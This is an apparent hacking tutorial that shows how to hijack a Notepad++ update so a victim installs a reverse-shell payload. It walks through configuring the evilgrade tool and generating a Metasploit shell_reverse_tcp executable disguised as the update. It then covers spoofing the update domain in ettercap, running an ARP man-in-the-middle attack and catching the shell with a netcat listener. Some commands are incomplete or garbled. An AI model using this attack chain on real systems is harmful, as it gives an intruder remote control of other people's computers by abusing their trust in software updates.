Welcome back, my neophyte hackers!
There are innumerable ways to hack a system. We must not overlook any of the possibilities if we want to "own" the system. As systems become more and more secure, we need to be vigilant in our search for weaknesses. In this hack, we'll look at abusing the trust that a user innately has for software updates to install our own listener/rootkit on their system.
All of us have seen that message—software updates are available now! Invariably, we trust this message and download the update to presumably make our system work better, add a new feature, or make our system safer.
What if, instead, when we're prompted to download that update, we are installing malicious software on our system that would give a malicious hacker control of our system? That's what we are going to do to our victim here!
Unlike many of our hacks, this one is independent of just about any other factors such as operating system, ports, etc. Here we will be abusing trust, not an operating system or application.
This will be one of the most complex hacks we've ever done on Null Byte, so if you're new to hacking, you may want to come back after doing bit of background work. This hack also leverages what we did in an earlier tutorial using a MitM attack, so you may want to read that one first.
In this hack, we will be using Notepad++ as our example software that we will hijack its update, so you will need to install it on one system. In my example, I have downloaded it to a Windows 7 system.
You can download the newest version of Notepad++ on their website.
Next, we will install Infobytesec's evilgrade, which was designed to be a modular framework that allows the attacker to take advantage of poor upgrade implementations by injecting "evil" updates to an unaware user. We can download evilgrade from GitHub.
Now make directory called evilgrade.
- mkdir -p /root/evilgrade
Now change to that directory.
- cd /root/evilgrade
Next we extract and install evilgrade.
- tar -xvf isr-evilgrade-2.0.0.tar.gz
Next we need to run evilgrade. We type:
This puts evilgrade into interactive mode where we now use it from its own prompt:
Now that evilgrade is running, let's take a look at the modules that evilgrade has built in. Here, the modules represent software that evilgrade is designed to hijack its updates/upgrade process. In this hack, of course, we will be hijacking the upgrade of Notepad++.
As you can see below, evilgrade has modules for many other pieces of software, but it's far from covering all software updates/upgrades.
- show modules
The key is to find what apps the victim is using that are also on evilgrade's list of modules and target that application.
Next, we need to tell evilgrade what software we want to hijack its upgrade process. Let's tell evilgrade we want to hijack notepadplus.
- evilgrade>configure notepadplus
Our next step is to see what parameters the evilgrade notepadplus module requires to function. We check this with a command similar to Metasploit by typing:
- show options
As we can see in the screenshot above, this module requires that we point it to the source of the Notepad++ software and updates, namely sourceforge.net. In addition, we need to set the agent which will be the malicious payload we want to install on the victim in place of the expected update.
Now that we have evilgrade setup and configured, we need to develop a malicious payload to deliver to the upgrading software instead of the actual upgrade. We can do this with Metasploit.
If you have followed my other tutorials on Metasploit, you know that we can choose a number of different payloads using Metasploit (a payload is what we load on to victim system to give us control). In this case, we will be using one of the most basic payloads, the reverse tcp shell.
We can generate a payload without opening Metasploit with the following command. This command takes an exploit from the Metasploit framework and loads it to a file called notepadplus_update.exe.
- /pentest/exploits/framework/modules/payloads/windows shell_reverse_tcp LHOST 192.168.1.104 > /root/evilgrade/notepadplus_update.exe
Note, that if you are using a different version of BackTrack or Kali, these payload modules may be in a different directory.
Next, we have to start the evilgrade server. This is done with a simple start command.
Our next step is to add Notepad++ to the domain we want to hijack. We can do this by adding an entry to ettercap's etter.dns spoofing module. This enables us to spoof the domain name of the update source for the victim software.
Since Notepad++ is hosted by sourceforge, we add the following line to the end of the etter.dns file.
- notepad-plus.sourceforge.net A 192.168.1.104
Of course, the IP address you should use is the IP address that you want the update process to look to for your evil update.
Iptables are the Linux/Unix built-in firewall/router. We can use this feature to route the traffic through our system in a MitM attack. Let's open the etter.conf file in your favorite text editor.
- kwrite /etc/etter.conf
As you see when you scroll down about two-thirds of the way through the file, there's an entry that I have highlighted on iptables. Simply uncomment (remove the #) to the second and third lines to enable using iptables.
We can now start ettercap with the following command.
- ettercap -Tqi eth0 -P dns_spoof -M arp 192.168.1.114 192.168.1.104
- --T designates the Terminal interface
- -q says use quiet mode
- -i eth0 says we want to use eth0 as our interface
- -P dns_spoof designates that we want to use the dnsspoof plug in_
- -M arp says we want to use a MitM attack with arp on between the two IP addresses_
Now we need to start the netcat listener from our attack machine. We need to listen on the port defined by the evilgrade app, in this case, 1234 for Notepad++.
- nc -l -p 1234
Now, let's open Notepad++ from our Windows victim machine.
If the update doesn't fire as soon as you open Notepad++, we need to check the DNS spoof.
Evilgrade is a powerful tool for hijacking software updates. By playing a Man-in-the-Middle attack, we can attack just about any operating system with the updating software. The only limitation we have here are the modules that evilgrade is designed to hijack its update.